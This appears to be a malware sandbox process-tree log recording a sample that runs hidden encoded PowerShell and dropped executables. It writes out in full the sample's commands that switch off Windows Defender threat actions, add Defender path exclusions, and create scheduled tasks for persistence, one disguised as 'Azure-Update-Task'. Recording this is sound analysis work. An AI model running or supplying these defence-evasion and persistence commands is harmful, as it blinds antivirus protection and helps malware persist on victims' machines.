c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\OOWUeMc.exeC:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\OOWUeMc.exe uG /site_id 394347 /S2⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DOWaNXZtDJLiC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DOWaNXZtDJLiC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EHjpVGHxoTMU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EHjpVGHxoTMU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RQzLvVUNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RQzLvVUNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVgZiWyyyxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVgZiWyyyxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NKsRZGTfNWtvCUVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NKsRZGTfNWtvCUVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mlmrxyCihFugMjhe\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mlmrxyCihFugMjhe\" /t REG_DWORD /d 0 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EHjpVGHxoTMU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EHjpVGHxoTMU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RQzLvVUNU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RQzLvVUNU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVgZiWyyyxUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVgZiWyyyxUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NKsRZGTfNWtvCUVB /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NKsRZGTfNWtvCUVB /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mlmrxyCihFugMjhe /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mlmrxyCihFugMjhe /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOWWqevQB" /SC once /ST 02:12:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOWWqevQB"3⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOWWqevQB"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YqJChhYnTMHzkMjCc" /SC once /ST 04:23:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\bXhtqdI.exe\" lA /site_id 394347 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YqJChhYnTMHzkMjCc"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\bXhtqdI.exeC:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\bXhtqdI.exe lA /site_id 394347 /S2⤵
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
